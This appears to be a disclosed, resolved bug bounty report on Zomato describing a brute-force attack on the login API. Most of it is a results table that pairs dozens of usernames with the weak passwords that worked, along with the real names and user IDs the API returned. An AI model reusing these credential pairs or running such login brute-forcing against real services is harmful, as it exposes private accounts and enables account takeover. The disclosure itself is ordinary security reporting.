takeover a lot of accounts
High
Z
Zomato
Submitted None
Team Summary
Official summary from Zomato
Bruteforce attack in login api call lead to breakthrough some accounts. Fixed now.
Actions:
Reported by
yipman
Vulnerability Details
Technical details and impact analysis
Weak password may lead to breakthrough many accounts I have been able to penetrate more than 100 account now.
██████
These are some of the accounts,
███
(Username ) (password) (Timeout) (Length) (the response)
maryanne 123456 false 2241 "status":"true","name":"Mary Anne Gonzales","isNew":false,"user_id":32173616
dermot 123456 false 2235 "status":"true","name":"Dermot Halpin","isNew":false,"user_id":7454691
cecelia 123456 false 2234 "status":"true","name":"Nikhil Jain","isNew":false,"user_id":35506188
mel 123456 false 2234 "status":"true","name":"Melbournian","isNew":false,"user_id":23666776
ade 123456 false 2233 "status":"true","name":"Ade Ramone","isNew":false,"user_id":21373603
joanne 123456 false 2233 "status":"true","name":"Whatisthis","isNew":false,"user_id":23405975
cristiano 123456 false 2232 "status":"true","name":"Cristiano","isNew":false,"user_id":36173575
ken 123456 false 2207 "status":"true","name":"Kentv34","isNew":false,"user_id":10913421
larissa 123456 false 2207 "status":"true","name":"Larissa","isNew":false,"user_id":23994281
alfred 123456 false 2206 "status":"true","name":"Alfred","isNew":false,"user_id":22842777
jordon 123456 false 2206 "status":"true","name":"Jordon","isNew":false,"user_id":23655216
maris 123456 false 2206 "status":"true","name":"Ozwaee","isNew":false,"user_id":10927081
rowena 123456 false 2206 "status":"true","name":"Rowena","isNew":false,"user_id":33832164
jan 123456 false 2205 "status":"true","name":"Nkfgk","isNew":false,"user_id":11762071
lucas 123456 false 2205 "status":"true","name":"Lucas","isNew":false,"user_id":24011188
maria 123456 false 2205 "status":"true","name":"Maria","isNew":false,"user_id":10890321
price 123456 false 2205 "status":"true","name":"Price","isNew":false,"user_id":12126991
ricky 123456 false 2205 "status":"true","name":"Ricky","isNew":false,"user_id":25249282
stefan 123456 false 2205 "status":"true","name":"Fabio","isNew":false,"user_id":29101376
brad 123456 false 2204 "status":"true","name":"Brad","isNew":false,"user_id":22917465
juan 123456 false 2204 "status":"true","name":"Juan","isNew":false,"user_id":25608209
bunny 123456 false 2203 "status":"true","name":"Bunny","isNew":false,"user_id":334327
dolly 123456 false 2203 "status":"true","name":"Dolly","isNew":false,"user_id":341259
lia 123456 false 2203 "status":"true","name":"Lia","isNew":false,"user_id":25082436
niki 123456 false 2202 "status":"true","name":"Niki","isNew":false,"user_id":341296
katherine 12345 "status":"true","name":"Burgers Plus Green Mountain","isNew":false,"user_id":23478827
had qwerty "status":"true","name":"M'lbFoodCritic","isNew":false,"user_id":24219454
kristine qwerty "status":"true","name":"Kristine Dela Cruz","isNew":false,"user_id":36549534
chelsea 12345 "status":"true","name":"Chelsea Ronald","isNew":false,"user_id":33920791
kaleb 12345 "status":"true","name":"Kaleb Lawrence","isNew":false,"user_id":33920508
april 12345 "status":"true","name":"April Hensley","isNew":false,"user_id":21251960
nana 12345678 "status":"true","name":"Sohal Patel","isNew":false,"user_id":22249776
amelia 12345 "status":"true","name":"Amelia Diaz","isNew":false,"user_id":34195947
hale 12345 "status":"true","name":"Hale Cansoy","isNew":false,"user_id":18833440
jill 12345 "status":"true","name":"Jillandjack","isNew":false,"user_id":33879337
joey qwerty "status":"true","name":"Joe Niater","isNew":false,"user_id":22997389
prince 123456789 "status":"true","name":"Prince Kumar","isNew":false,"user_id":591208
bill 12345 "status":"true","name":"Bill Thomp","isNew":false,"user_id":22737478
den 12345 "status":"true","name":"Ugur Sss","isNew":false,"user_id":19430947
laurence 12345 "status":"true","name":"Laurence","isNew":false,"user_id":33493224
lorraine 12345 "status":"true","name":"Lorraine","isNew":false,"user_id":33891274
charlie 12345 "status":"true","name":"Charlie","isNew":false,"user_id":22617986
douglass 12345 "status":"true","name":"Douglas","isNew":false,"user_id":33533934
johnny 12345 "status":"true","name":"John Alai","isNew":false,"user_id":732722
monty 12345678 "status":"true","name":"Monty","isNew":false,"user_id":21669794
simon 12345678 "status":"true","name":"Simon","isNew":false,"user_id":5161521
vinson qwerty "status":"true","name":"Vinson","isNew":false,"user_id":28146375
carl 123456789 "status":"true","name":"Carlos","isNew":false,"user_id":11993621
alicia 12345 "status":"true","name":"Alicia","isNew":false,"user_id":22914207
chrisy 12345 "status":"true","name":"Chrisy","isNew":false,"user_id":24264674
Any 12345678 "status":"true","name":"Any","isNew":false,"user_id":32140552
any 12345678 "status":"true","name":"Any","isNew":false,"user_id":32140552
clint 12345 "status":"true","name":"Clint","isNew":false,"user_id":20563177
dante 12345 "status":"true","name":"Dante","isNew":false,"user_id":35031010
linda 12345 "status":"true","name":"Linda","isNew":false,"user_id":22400357
sa 12345678 "status":"true","name":"Sat","isNew":false,"user_id":4670091
west 12345678 "status":"true","name":"West","isNew":false,"user_id":22873679
husain qwerty "status":"true","name":"Free","isNew":false,"user_id":31480997
isis qwerty "status":"true","name":"Isis","isNew":false,"user_id":25107230
george 123456789 "status":"true","name":"George","isNew":false,"user_id":302853
hope 123456789 "status":"true","name":"Hope","isNew":false,"user_id":23411815
alia 12345 "status":"true","name":"Alia","isNew":false,"user_id":28162730
joel 12345 "status":"true","name":"Joel","isNew":false,"user_id":25139013
stanly qwerty "status":"true","name":"Ram","isNew":false,"user_id":36393602
katya 12345 "status":"true","name":"Katya","isNew":false,"user_id":146048
WP 12345 "status":"true","name":"Wp","isNew":false,"user_id":815499
stefano 1234567 "status":"true","name":"Stefano","isNew":false,"user_id":20644506
keane 1234567 "status":"true","name":"Keane","isNew":false,"user_id":21242717
DEMO 12345678 "status":"false","name":"","isNew":"false","message":"The verification process for this email is yet
demo 12345678 "status":"false","name":"","isNew":"false","message":"The verification process for this email is yet
alex qwerty "status":"false","name":"","isNew":"false","message":"The verification process for this email is yet
nani 123456789 "status":"false","name":"","isNew":"false","message":"The verification process for this email is yet
james 12345 "status":"false","name":"","isNew":"false","message":"The verification process for this email is yet
Report Details
Additional information and metadata
State
Closed
Substate
Resolved